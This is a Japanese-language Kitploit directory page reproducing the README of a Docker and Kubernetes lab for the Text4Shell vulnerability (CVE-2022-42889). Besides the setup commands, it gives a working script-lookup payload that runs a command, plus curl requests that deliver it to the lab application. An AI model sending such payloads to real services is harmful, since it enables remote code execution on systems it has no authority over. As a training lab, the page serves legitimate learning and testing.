Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
text4shell-cve-2022-42889 — CVE-2022-42889 用 Kubernetes ラボ | Kitploit
ツール/GitHubGitHub/devenes/text4shell-cve-2022-42889
コンテナセキュリティ脆弱性分析ウェブアプリケーション悪用クラウドセキュリティ学習と教育ラボと実践
GitHubdevenes/text4shell-cve-2022-42889

text4shell-cve-2022-42889

CVE-2022-42889 用 Kubernetes ラボ

リポジトリを見る
213年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Text4Shell CVE-2022-42889

CVE-2022-42889 用 Docker ラボ

Docker イメージはローカルでビルドするか、Docker Hub からプルしてコンテナを実行できます。

リポジトリをクローンする

root@kitploit:~
git clone https://github.com/devenes/text4shell-cve-2022-42889.git

Docker イメージをローカルでビルドする

root@kitploit:~
docker build --tag=text4shell .

Docker コンテナを実行する

root@kitploit:~
docker run -d --rm -p 8080:8080 text4shell

または Docker Hub からイメージをプルしてコンテナを実行する

root@kitploit:~
docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

search パラメータに文字列を渡してアプリをテストする:

root@kitploit:~
curl http://localhost/text4shell/attack?search=<anything>
  • 攻撃は、前述のルックアップをプレフィックスとする ${prefix:name} 形式の文字列を渡すことで実行できます:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

curl を使用した攻撃:

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
  • dns や url のプレフィックスも試すことができます。

コンテナ ID を取得する

root@kitploit:~
docker container ls

コンテナに入る

root@kitploit:~
docker exec -it <container_id> bash

RCE 攻撃が成功したか確認する

  • /tmp ディレクトリに foo という名前のファイルが作成されているはずです:
root@kitploit:~
ls /tmp/

以下のコマンドを実行してコンテナを停止できます

root@kitploit:~
docker container stop <container_id>

CVE-2022-42889 用 Kubernetes ラボ

kubernetes ディレクトリに移動し、README.md ファイルの指示に従います。

root@kitploit:~
cd kubernetes

kind クラスタを作成する

root@kitploit:~
kind create cluster --config kind-config.yaml

脆弱なアプリをクラスタにデプロイする

root@kitploit:~
kubectl apply -f deployment.yaml

アプリを公開するサービスを作成する

root@kitploit:~
kubectl apply -f service.yaml

curl を使用して脆弱なアプリを攻撃する

root@kitploit:~
curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

kubectl get pods を使用してポッド名を取得する

root@kitploit:~
kubectl get pods

kubectl exec を使用してポッドに入る

root@kitploit:~
kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

攻撃が成功したか確認する

root@kitploit:~
ls /tmp/ | grep foo

詳細なチュートリアルは、私の Udemy コース でご覧いただけます。


参照:

  • https://github.com/karthikuj/cve-2022-42889-text4shell-docker
  • https://www.docker.com/blog/security-advisory-cve-2022-42889-text4shell/
  • https://unifiedguru.com/security-advisory-cve-2022-42889-text4shell-docker/
  • https://medium.com/mii-cybersec/cve-2022-42889-text4shell-vulnerability-17b703a48dcd
ツールをダウンロード